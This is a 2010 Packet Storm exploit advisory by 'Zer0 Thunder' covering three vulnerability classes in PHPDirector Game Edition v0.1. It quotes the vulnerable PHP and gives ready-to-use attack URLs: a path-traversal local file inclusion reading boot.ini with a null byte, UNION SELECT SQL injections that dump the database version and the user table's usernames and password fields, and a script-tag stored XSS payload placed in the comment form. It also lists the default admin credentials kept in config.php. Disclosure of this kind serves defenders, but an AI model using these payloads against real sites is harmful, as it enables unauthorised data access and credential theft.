PHPDirector Game Edition Cross Site Scripting / Local File Inclusion / SQL Injection

2010-01-07T00:00:00
ID PACKETSTORM:84876
Type packetstorm
Reporter Zer0 Thunder
Modified 2010-01-07T00:00:00

Description

                                        
                                            `# Exploit Title: PHPDirector Game Edition Multiple Vulnerabilities (LFI/SQLi/Xss)  
# Date: 2010-01-05  
# Author: Zer0 Thunder  
# Site : http://www.play-online.bzh.be/forum/  
# Software Link: http://www.play-online.bzh.be/forum/download/phpdirectorgameedition.zip  
# Version: v0.1  
# Tested on: Windows XP sp2 [WampServer 2.0i] / LinuxBox ( Ubuntu Server 9.10)  
# CVE :   
# Code :  
  
  
Local File Inclusion !  
  
Header.php Vuln  
-----------------------------  
if(!$_GET["lang"])  
{  
include("lang/".config('lang'));  
}  
else  
{  
SetCookie("lang",$_GET["lang"]);  
header('Location: ' . $_SERVER['HTTP_REFERER'] );   
}   
if (!$_COOKIE["lang"])  
{   
include("lang/".config('lang'));  
}  
else  
{  
$lang = $_COOKIE["lang"];  
include("lang/" . $lang . ".inc.php");  
}  
  
-------------------------------  
  
Exploit :  
http://site.com/path/header.php?header.php?lang=[LFI]  
  
  
Sample ( Tested on a windows box)  
http://localhost/phpdirectorgameedition/header.php?lang=../../../../boot.ini%00  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
  
SQL Injection   
  
Page : Games.php Vuln Page (line 12 / 121 - 128 )  
-----------------------------------------  
$idc = $_GET["id"];  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
if(isset($idc) && is_numeric($idc)){  
$id = mysql_real_escape_string($idc);  
$result = mysql_query("SELECT * FROM pp_files WHERE id=$id AND `approved` = '1' LIMIT 1") or die(mysql_error());   
}else{  
$result = mysql_query("select * from pp_files WHERE approved='1' AND reject='0' order by rand() LIMIT 1") or die(mysql_error());   
}  
  
-----------------------------------  
## There is also a vuln possiblility on line 27-57  
  
Exploit :  
http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
http://site/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--  
  
  
Example :   
  
DB Version  
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
Users  
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--  
  
# You can't find admin username password in the SQL Database ,It's stroed in config.php  
# line 15-16  
#  
#$cfg["admin_user"] = "admin";   
#$cfg["admin_pass"] = "test";  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
XSS ( Cross Site Scripting )   
  
You Can even use a Xss Shell on this Vuln  
Goto this page   
  
http://localhost/phpdirectorgameedition/games.php?id=1  
  
In the comment form put "<script>alert("XSS")</script>" then put a sybmit the comment   
  
Vuln Code   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
if(isset($_POST['go']) && !empty($_POST['comment']) && !empty($_POST['nom']))  
{  
mysql_query("INSERT INTO pp_comment (file_id, nom, comment,ip) VALUES ('$_POST[id]', '$_POST[nom]','".addslashes($_POST['comment'])."','$ip')");  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
########################################  
# MSN : zer0_thunder@colombohackers.com  
# Email : neonwarlock@live.com  
# Site : LKHackers.com  
# Greetz : To all my friends  
# Note : Proud to be a Sri Lankan  
# Me : Sri Lankan Hacker  
########################################  
  
  
`